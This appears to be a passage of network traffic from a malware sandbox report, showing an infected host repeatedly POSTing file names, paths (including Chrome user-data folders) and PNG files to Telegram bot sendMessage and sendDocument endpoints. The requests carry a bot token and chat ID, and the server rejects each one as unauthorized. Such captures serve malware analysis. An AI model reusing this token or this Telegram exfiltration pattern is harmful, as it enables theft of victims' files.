ac 8d ee ee 35 3b 11 6c 2f ed 59 00 40 88 38 7c f8 b0 ea ea a1 df d9 97 0b 59 35 6e 9e fa f5 fe fd fb 9e 6e 3b aa 0e 1f ea 96 a8 cd 62 56 Data Ascii: Y9q^L.Ljr=XW(WMrWcmMMu)(l#G'O\|*dWnqlsSZuFzzRb<Q5@r'%L\|~^h\|nU%j[;-wVJ1@jJW513l2H{!Cm5;l/Y@8\|Y5nn;bV
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: f2 ee 7e 69 9c bb 6c 6a b8 3c 03 00 20 60 e4 aa 40 3d 14 76 d1 a2 45 72 51 41 c6 19 ca 64 07 c9 6e 52 8f 80 f5 3e 6e 53 cf 11 c1 02 00 00 f4 55 6a 1c bc d4 d4 54 7d a6 7a 46 5a 44 44 44 af fe 3f 3e 20 c0 f4 db e5 a1 e3 da b5 6b 6a 94 4e ef f7 df 01 9a 71 e0 a5 fa 9b 92 91 91 a1 3a 01 eb 63 1b 34 34 34 8c 1d 3b 36 04 ff 96 01 00 00 bf 28 2d 2d 1d 39 72 a4 4a 61 e9 0b 1b ca fd 5f 55 fe 2a 3b 4b 76 59 6f 1f 15 44 b0 00 00 00 7d d5 ae 5d bb 06 0c 18 10 16 16 96 9c 9c 5c 58 58 78 e5 ca 95 2d 5b b6 a8 e1 e6 f6 ef df 4f fd e0 45 12 6a 11 ac 6c c9 c1 83 07 d5 53 51 b7 6e dd ca 0e 02 cd 38 c0 df 14 43 73 73 b3 1a 7f 78 fa f4 e9 17 2f 5e 2c 2e 2e 3e 73 e6 8c 1a d5 79 e4 c8 91 fc af 1d 00 00 5e 54 f2 47 5f a5 b0 b3 67 cf e6 b9 b0 a1 f9 fc 57 35 fe b0 ec 26 d9 59 01 Data Ascii: ~ilj< `@=vErQAdnR>nSUjT}zFZDDD?> kjNq:c444;6(--9rJa_U*;KvYoD}]\XXx-[OEjlSQn8Cssx/^,..>sy^TG_gW5&Y
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: 03 74 9b 9a 9a 3c d5 c3 de bd 7b 8d 62 97 2f 5f 36 bd 6a 0c 8b 2d 0a 0a 0a 9e 11 c1 12 c1 02 00 00 00 00 00 00 00 00 9b 88 60 43 21 82 ed e8 e8 d0 fb 7a 7a 32 70 e0 40 35 5a ec ae 5d bb 3c 8d 34 eb 29 82 d5 47 03 4e 4b 4b bb 79 f3 a6 f5 e9 b0 ab 56 ad 32 bd 5d 64 64 e4 88 11 23 7a 18 c1 ea fd 62 3d 1d 66 fa 27 92 aa 18 f8 bc b0 b0 b0 f0 f0 f0 a8 a8 a8 c7 8f 1f 17 15 15 79 1a b2 58 8f 60 13 12 12 bc 1c 1b fa 67 34 bd 91 88 88 88 50 0f fa ed 6e 3d 07 3e 82 6d 6b 6b 93 6a f1 74 c0 1c 39 72 c4 cb 51 b7 67 cf 1e b7 87 8a a2 3f 04 57 8e 96 67 44 b0 44 b0 00 00 00 00 00 00 00 00 c0 26 06 22 f6 99 1f 07 22 fe ea ab af 5e b5 47 f5 47 fc f2 cb 2f 3d 85 5e 9e 22 58 3d e5 9d 3f 7f fe a7 9f 7e 6a 7d 86 a8 91 f0 f5 ef df df c8 65 9b 9b 9b 7b 18 c1 ea 61 5e 6a 6a aa db Data Ascii: t<{b/_6j-`C!zz2p@5Z]<4)GNKKyV2]dd#zb=f'yX`g4Pn=>mkkjt9rQg?WgDD&""^GG/=^"X=?~j}e{a^jj
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: bc 32 e0 f5 d7 7b d2 27 a3 a1 a1 a1 b0 a0 60 fb b6 6d e1 8e b0 7f fa d1 8f ff f1 ef fe de d3 7b fd f4 87 ff f8 af ff f2 ea b8 d1 63 0e 1d 38 18 ac 90 b2 ac ac ec b3 4f 3f 9d 18 1d fd fb 7f fd ad 7f 87 c0 55 d3 1b 7f 79 7d 6b e2 d6 82 82 02 a9 16 da 04 4f ba 3b e4 23 7a 82 08 16 78 f1 7c f7 dd 77 4f 9e 3c 91 53 f8 f4 c9 53 f1 1f 2f ec ff ef 7f 54 67 b7 fc 09 96 3f c4 bf 7d f5 57 ff f7 cf ff 35 29 2a 3a 71 f3 e6 73 67 cf c9 9f a4 07 f7 ef 3b 9d 4e 7d 0d 2a be 95 3f fd f2 3d 6a c9 a2 c5 63 46 8e d2 03 45 f9 63 3d 72 f8 f0 b5 ab 57 cb df 77 59 50 de ab 6f d5 4f 6f c7 81 79 b9 b9 ef 4f 9c 24 b5 24 17 36 2a b4 96 bf 89 f2 a5 f4 45 fd 0f 58 a1 50 e7 7c 6f 02 40 9b 00 bc e4 88 60 01 c0 8a 08 16 e0 6b 03 82 a3 a5 a5 e5 ce 9d 3b 47 0e 1d 1e 3b ea 6d 7d 80 41 eb f4 Data Ascii: 2{'`m{c8O?Uy}kO;#zx\|wO<SS/Tg?}W5):qsg;N}?=jcFEc=rWwYPoOoyO$$6*EXP\|o@`k;G;m}A
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: d5 fc f6 83 98 68 f9 07 31 f3 d4 66 c1 59 e1 61 61 77 aa ab d9 3e 23 f4 09 91 90 f5 a7 62 cd 8a 82 4f f5 3c 6f d6 2c 6b 4b cb 5d 02 f1 85 aa 83 ea c6 1a ef b5 d4 17 2c 74 71 72 72 db b0 41 47 43 83 8f 35 ff 90 12 11 63 96 91 80 6f bf 35 33 32 62 23 7d 95 b9 17 60 9f 84 6e 03 ce d6 c6 dc 62 f1 bc f9 bc 0e a5 f8 76 53 43 23 e8 d5 ec bd 4c 79 0a 56 d5 1e 9b de 9b 08 04 02 f9 04 02 e1 83 01 51 b0 04 02 81 c0 83 28 58 02 81 5e 1b 08 93 05 8a 52 a7 ab 57 d8 9d 49 4b 6b 6d 69 19 1c 18 c0 1a c6 97 ca 9d 78 e0 b4 a6 9f af af 8e 86 86 50 c3 17 cc 9e 63 6d 66 0e 2a 1a f3 06 9a b9 98 73 71 f2 a4 c5 9b 9c 3e 81 9f b4 45 72 22 2f 37 f7 5a 69 29 54 3b e6 ad be be fe e9 d3 a7 52 56 5d c5 14 d9 6b ec ec b4 96 a8 cf 9b 35 4b 63 e1 22 23 bd a5 70 14 ed 68 bf 72 25 1c 35 37 Data Ascii: h1fYaaw>#bO<o,kK],tqrrAGC5co532b#}`nbvSC#LyVQ(X^RWIKkmixPcmf*sq>Er"/7Zi)T;RV]k5Kc"#phr%57
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: ee c4 a3 eb 26 a6 66 d4 7c 93 4c 96 78 e4 88 db 06 67 f5 85 8b b0 3f c0 70 fb f2 93 4f 31 f4 5c 63 d1 62 0f 57 b7 e3 89 c7 c0 04 d2 7b e3 54 ac 79 6c fe 73 38 35 77 b0 d0 6a ca e3 8b 89 19 6b bc d7 52 74 bd f6 a9 45 c1 f2 4f 29 78 87 8a 08 0f 87 9b da 78 25 2a 97 f2 64 d8 da d2 52 52 5c 0c 02 c3 76 26 2d 6d 7f 7c bc 9f 8f 0f dc 56 d8 cf f5 ac cd cc 4f 25 9f 6c 92 35 0d f4 0f 8c 4d e7 13 d3 8b e8 bd 89 40 20 d0 5c 0a 81 f0 81 81 28 58 02 81 40 e0 41 14 2c 81 40 af 0d 84 c9 0b 8c e8 f2 d8 b8 51 5b 5d 7d d4 dc bc 0a 6d b8 8e d7 1a 3b bb 63 47 8f 8e 6f d2 45 e5 81 ab 18 9e 38 9e 64 65 6a 26 24 3f 4e 61 9f cb c8 ac ab ab 7b f0 e0 41 dd dd bb 98 af 8f a5 f7 aa 2a 2b 1b 1b 1b ef b7 b5 75 76 76 8e 6f d4 da c7 e6 13 14 9d ec 56 1e fc 84 3e a6 4b 3d 78 e0 dd ab 78 Data Ascii: &f\|Lxg?pO1\cbW{Tyls85wjkRtEO)xx%dRR\v&-m\|VO%l5M@ \(X@A,@Q[]}m;cGoE8dej&$?Na{A+uvvoV>K=xx
2024-05-23 13:36:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:30 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.5	61315	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:30 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:36:30 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+48.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:36:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.5	61316	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:30 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 192 Expect: 100-continue
2024-05-23 13:36:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:31 UTC	192	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 43 6c 6f 73 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 74 68 65 6d 65 73 25 35 43 64 61 72 6b 25 35 43 43 6c 6f 73 65 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 37 38 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+Close.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cthemes%5Cdark%5CClose.png%0ASize%3A+278+B
2024-05-23 13:36:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.5	61317	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:31 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:36:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:31 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 64 62 33 34 36 30 61 63 38 35 36 38 64 30 31 33 37 64 34 35 35 36 35 37 30 31 36 39 65 34 37 35 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 64 62 33 34 36 30 61 63 38 35 36 38 64 30 31 33 37 64 34 35 35 36 35 37 30 31 36 39 65 34 37 35 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 34 30 2b Data Ascii: chat_id=1655240967&text=File%3A+db3460ac8568d0137d4556570169e475.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Cdb3460ac8568d0137d4556570169e475.png%0ASize%3A+40+
2024-05-23 13:36:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.5	61318	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:31 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="abd7000b-0fa8-45e1-b558-b29acd39828d" Host: api.telegram.org Content-Length: 1404 Expect: 100-continue
2024-05-23 13:36:32 UTC	40	OUT	Data Raw: 2d 2d 61 62 64 37 30 30 30 62 2d 30 66 61 38 2d 34 35 65 31 2d 62 35 35 38 2d 62 32 39 61 63 64 33 39 38 32 38 64 0d 0a Data Ascii: --abd7000b-0fa8-45e1-b558-b29acd39828d
2024-05-23 13:36:32 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=48.png; filename*=utf-8''48.png
2024-05-23 13:36:32 UTC	1088	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 04 07 49 44 41 54 68 81 ed 5a bf 6f 1c 45 14 fe be 37 bb 77 b7 3e 9f ef 70 04 46 28 08 21 a5 4a 83 10 55 3a fe 05 84 9c 1e 09 a5 00 51 04 51 20 42 71 85 2d d1 50 21 a5 30 51 5a 24 fb 7f 20 25 4a 11 45 14 88 82 10 21 05 90 02 42 38 39 db eb db db 9d 47 31 7b fe b9 7b be fd 91 35 85 3f 69 75 d2 ed ce 7b ef 9b 37 f3 cd db 99 05 e6 c1 aa 9a b9 9e 9b 1b ca ba 2c cd 6d e8 ca 27 bf b4 2f 5f ba 12 00 db 95 1c 8e 3a aa 0f 3e 5f 7e e6 48 50 2b 19 c3 1c 04 ae 0e 7f 6a bd d2 7a 73 dd 18 ef 7d 8d 27 7d 85 12 3a 3f f1 03 a8 82 46 92 84 be 3c 7e f2 e8 eb 27 b7 af ae 63 55 0d b6 98 94 8a 3c 85 97 7b 67 a8 82 21 ed 8a ff c6 57 ed 5e 70 33 1a 8d 01 0a 84 e5 b2 af aa 20 Data Ascii: PNGIHDR00WIDAThZoE7w>pF(!JU:QQ Bq-P!0QZ$ %JE!B89G1{{5?iu{7,m'/_:>_~HP+jzs}'}:?F<~'cU<{g!W^p3
2024-05-23 13:36:32 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 62 64 37 30 30 30 62 2d 30 66 61 38 2d 34 35 65 31 2d 62 35 35 38 2d 62 32 39 61 63 64 33 39 38 32 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --abd7000b-0fa8-45e1-b558-b29acd39828dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:32 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:32 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 62 64 37 30 30 30 62 2d 30 66 61 38 2d 34 35 65 31 2d 62 35 35 38 2d 62 32 39 61 63 64 33 39 38 32 38 64 2d 2d 0d 0a Data Ascii: --abd7000b-0fa8-45e1-b558-b29acd39828d--
2024-05-23 13:36:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.5	61319	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:32 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f8451159-dc44-4a7a-aa25-3a00ea09d03e" Host: api.telegram.org Content-Length: 600 Expect: 100-continue
2024-05-23 13:36:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:32 UTC	40	OUT	Data Raw: 2d 2d 66 38 34 35 31 31 35 39 2d 64 63 34 34 2d 34 61 37 61 2d 61 61 32 35 2d 33 61 30 30 65 61 30 39 64 30 33 65 0d 0a Data Ascii: --f8451159-dc44-4a7a-aa25-3a00ea09d03e
2024-05-23 13:36:32 UTC	97	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 43 6c 6f 73 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 6c 6f 73 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Close.png; filename*=utf-8''Close.png
2024-05-23 13:36:32 UTC	278	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 0a 08 06 00 00 00 8d 32 cf bd 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 d0 49 44 41 54 18 19 95 8e b1 0e c1 60 14 85 15 bb 18 3d 80 30 8a 59 db c5 03 f0 0a 44 62 10 9b a1 8b 78 07 83 c9 68 30 4a 44 62 6c ff b6 31 9a 3d 87 c1 d0 b4 be 53 a9 88 89 93 dc 7b ee 7f ee b9 f7 bf a5 d2 3f 30 c6 d4 83 20 18 7c cf 44 51 d4 89 e3 b8 2d bd ac 94 65 59 03 da 61 9e e9 2d 50 77 93 24 31 44 4b 6f 4b 49 f0 7d df 81 ce 96 65 cd 19 bc 50 1b 6a cf 71 9c 8d fa 6f a3 1e 9c d0 4f d3 f4 48 f9 f8 34 a9 57 55 2a 80 29 c5 a0 e1 1a 51 29 74 71 7e a3 8a 30 0c 7b d0 89 d8 f2 f5 02 5e 73 e7 04 ce 91 7f cd 7d 4d 16 5d 51 f6 dc 34 52 07 6d 85 b6 a4 1c a2 1d f2 8d 08 77 c2 b3 6d 7b 2c 93 e0 ba ae 8c 53 b6 df 5e ca Data Ascii: PNGIHDR2sRGBIDAT`=0YDbxh0JDbl1=S{?0 \|DQ-eYa-Pw$1DKoKI}ePjqoOH4WU*)Q)tq~0{^s}M]Q4Rmwm{,S^
2024-05-23 13:36:32 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 38 34 35 31 31 35 39 2d 64 63 34 34 2d 34 61 37 61 2d 61 61 32 35 2d 33 61 30 30 65 61 30 39 64 30 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --f8451159-dc44-4a7a-aa25-3a00ea09d03eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:32 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:32 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 38 34 35 31 31 35 39 2d 64 63 34 34 2d 34 61 37 61 2d 61 61 32 35 2d 33 61 30 30 65 61 30 39 64 30 33 65 2d 2d 0d 0a Data Ascii: --f8451159-dc44-4a7a-aa25-3a00ea09d03e--
2024-05-23 13:36:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.5	61320	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:32 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="7e71501f-f78e-4e8b-b204-7cf7606d7793" Host: api.telegram.org Content-Length: 42190 Expect: 100-continue
2024-05-23 13:36:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:33 UTC	40	OUT	Data Raw: 2d 2d 37 65 37 31 35 30 31 66 2d 66 37 38 65 2d 34 65 38 62 2d 62 32 30 34 2d 37 63 66 37 36 30 36 64 37 37 39 33 0d 0a Data Ascii: --7e71501f-f78e-4e8b-b204-7cf7606d7793
2024-05-23 13:36:33 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 64 62 33 34 36 30 61 63 38 35 36 38 64 30 31 33 37 64 34 35 35 36 35 37 30 31 36 39 65 34 37 35 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 64 62 33 34 36 30 61 63 38 35 36 38 64 30 31 33 37 64 34 35 35 36 35 37 30 31 36 39 65 34 37 35 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=db3460ac8568d0137d4556570169e475.png; filename*=utf-8''db3460ac8568d0137d4556570169e475.png
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 02 00 00 00 81 39 75 dd 00 00 00 09 70 48 59 73 00 00 17 11 00 00 17 11 01 ca 26 f3 3f 00 00 20 00 49 44 41 54 78 9c ec dd 79 7c dc 67 7d 2f fa ef f3 3c bf 75 36 8d 66 24 59 92 37 79 77 6c 27 71 4c 62 20 40 08 49 6f 43 0b 2d 04 da a6 87 12 ba 51 ee b9 a4 9c 52 6e 5b 96 16 4e 5b 28 4b e9 02 b7 90 b6 e7 d0 52 42 0f a7 39 07 4a b8 2d 94 0b 4d 80 84 b8 89 93 38 4e e2 dd f1 2a 5b fb 32 fb 6f 7b 96 fb c7 6f e6 e7 f1 48 b6 b5 8c 34 92 fc 7d bf 78 19 69 34 f3 9b 47 8a 46 9f 79 b6 ef 43 d4 a9 23 80 10 42 08 a1 79 a3 ad 6e 00 42 08 21 b4 42 60 a6 22 84 10 42 cd 81 99 8a 10 42 08 35 07 66 2a 42 08 21 d4 1c 98 a9 08 21 84 50 73 60 a6 22 84 10 42 cd 81 99 8a 10 42 08 35 07 66 2a 42 08 21 d4 1c Data Ascii: PNGIHDRq9upHYs&? IDATxy\|g}/<u6f$Y7ywl'qLb @IoC-QRn[N[(KRB9J-M8N[2o{oH4}xi4GFyC#BynB!B`"BB5fB!!Ps`"BB5f*B!
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: fe e5 73 c7 5f 2c 4e 0c 8d 8d 4d 0c 8f 8e 17 0a 45 43 63 99 94 4d 09 0d 02 51 2a 3b f9 7c be 23 93 1a 1c 1e f5 ca b9 ee b4 65 58 b1 40 52 12 16 23 24 20 84 d8 ff ec 01 20 64 f3 c6 c6 35 7e a6 69 2a a5 1c c7 89 aa 2c 61 cd 7d 74 3d 88 7e c3 a3 92 bf 51 9a 46 ff 8a 6c a7 b5 ef 87 b3 ba ac 9c 18 f3 be ff 1d 62 5a fa ae 9b af 74 1f 55 2a 96 1f fc cb d2 9f fe 11 f8 fe 3c be 83 b9 23 b1 58 db fb 3e 40 74 a3 25 cf be c2 60 a6 2e 86 ea 4b 54 ca 80 73 cf f7 cd 55 ab 93 bd 6b 1b ee 53 a9 38 7f fc c9 cf be f8 e2 21 00 20 e1 43 a4 02 50 b5 5d a3 92 10 a2 00 94 14 23 e7 4f 1f 7b e9 c5 74 32 3e 3a 91 f7 b9 90 52 de bc 7d 43 3a 15 77 bc 60 74 2c 37 36 99 77 3d bf 23 9b 29 95 ca f1 78 7c 7c 22 1f b7 2c 23 16 77 03 a0 9a 0e 00 a0 08 a5 04 00 4e 9f 3d 3f 31 99 db bc 71 83 Data Ascii: s_,NMECcMQ;\|#eX@R#$ d5~i,a}t=~QFlbZtU*<#X>@t%`.KTsUkS8! CP]#O{t2>:R}C:w`t,76w=#)x\|\|",#wN=?1q
